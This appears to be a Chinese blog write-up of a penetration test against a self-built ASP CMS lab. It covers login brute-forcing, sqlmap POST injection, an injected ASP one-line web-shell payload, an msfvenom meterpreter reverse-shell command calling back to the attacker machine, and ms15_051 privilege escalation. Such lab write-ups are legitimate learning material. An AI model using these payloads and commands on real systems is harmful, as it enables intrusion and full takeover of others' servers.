一次渗透经验分享

                               **一次渗透经验分享**
 通过在网上看到好多大佬们使用msf工具来进行渗透测试,然后出于学习和探索工具的功能,自己在本地搭建了一个asp的靶场环境进行渗透。效果还是很不错的。
 测试环境:目标机   windows2003 192.168.42.132
                   攻击机   kali 192.168.43.252   win10(我本机) 192.168.43.109
 首先在本机访问192.168.42.132  
 ![这个cms是我从网上下载的](https://img-blog.csdnimg.cn/20190528203524740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dpbjE3NjQ4OQ==,size_16,color_FFFFFF,t_70)

进去点击会发现前台可以登陆账号

很惊喜,前台没有设置验证码,我们可以尝试爆破一下,打开burp设置好代理,加上本地字典跑一下试试。

成功爆破出前台登陆的用户和密码,但是登录上去发现貌似除了随便点点再退出账号并没又什么用。。。

再测试一下是不是可以注入呢,通过自己测试,找到一个报错的url
http://192.168.42.132/index.asp?a=news_list&id=21'

这个url地址放sqlmap跑一下,什么都跑不出来。。这里也不行
继续找,发现刚刚用户名加个 ‘ 也能报错

尝试post注入,把数据包放在sqlmap里跑一下试试


只跑出来一个user表,里面还是空的,所以我思考了一下,目标机用的是ACCESS数据库,因为sqlmap只能通过自己的字典进行枚举,于是我尝试将我自己建的表名输入进去 ,之后就爆出来了字段。

MD5解密一下 其中一个后台用户名为admin 密码admin888
现在可以登陆后台了,前台点击管理入口
输入用户密码成功到后台。在后台尝试了上传文件,发现网站的过滤很严,这条路是行不通了

于是测试能否在系统参数配置中插入一句话,查看代码我们发现这个文件的代码是经过加密处理的

通过分析源码,构造出插入的payload为%22%25%3e%3c%25eval+request+(%22pass%22)%25%3e%3c%25%27
利用抓包插入payload

放包,用菜刀连接index.asp(从源码分析得出index.asp包含刚刚修改的asp文件)

成功getshell ,但是这个权限很低,怎么才能提到系统权限呢,在kali机打开msf
使用venom模块生成test.exe的木马文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.43.252 LPORT=8888 -f exe > ./test.exe

将生成的木马文件和32为的cmd.exe传到目标机的目录下
然后在kali机调用 expolit/multi/handler模块

设置本地监听的IP 和端口 然后run

在菜刀中运行test.exe

kali机获取了一个会话连接

执行命令whoami ,得到的是一个普通权限

利用exoploit的模块提权,利用溢出漏洞进行提权
use exploit/windows/local/ms15_051_client_copy_image

返回会话1 利用ps查看新建的2540会话,再利用命令将会话迁移到2540

利用getsystem命令提权,成功执行并建立一条新的会话

再将会话迁移到新的会话,执行shell命令就提权成功啦

到此处为止,成功get到了操作系统的权限。
成功的道路需要知识和经验一点一点的铺垫,日积月累,才能突破自己

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值